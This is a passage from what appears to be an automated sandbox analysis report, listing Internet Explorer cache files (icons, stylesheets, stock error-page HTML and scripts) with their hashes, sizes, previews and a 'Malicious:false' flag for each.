                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ErrorPageTemplate[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\http_404[2]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
